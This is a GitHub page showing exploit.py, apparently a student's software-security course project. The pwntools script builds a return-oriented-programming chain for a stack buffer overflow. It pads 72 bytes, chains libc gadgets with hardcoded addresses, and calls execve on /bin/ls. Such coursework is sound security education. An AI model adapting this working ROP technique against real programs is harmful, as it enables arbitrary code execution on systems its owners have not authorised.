-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
35 lines (30 loc) · 889 Bytes
/
exploit.py
File metadata and controls
35 lines (30 loc) · 889 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
OFFSET = 72
buf_addr = 0x7fffffffc270
libc_base = 0x7ffff7c00000
execve_addr = 0x7ffff7ceef30
pop_rdi = libc_base + 0x10f78b
pop_rsi_rbp = libc_base + 0x2b46b
pop_rbx = libc_base + 0x586e4
mov_rdx_rbx = libc_base + 0xb0153
binls_offset = OFFSET + 12*8
binls_addr = buf_addr + binls_offset
argv_addr = binls_addr + 8
chain = b"PRATIK_KAMBLE_B00924004_CS553_SOFTWARE_SECURITY_PROJECT_COMPUTER_SCIENCE"
chain += p64(pop_rdi)
chain += p64(binls_addr)
chain += p64(pop_rsi_rbp)
chain += p64(argv_addr)
chain += p64(0)
chain += p64(pop_rbx)
chain += p64(0)
chain += p64(mov_rdx_rbx)
chain += p64(0) + p64(0) + p64(0)
chain += p64(execve_addr)
chain += b"/bin/ls\x00"
chain += p64(binls_addr)
chain += p64(0)
assert b"\n" not in chain, "invalid payload"
sys.stdout.buffer.write(chain)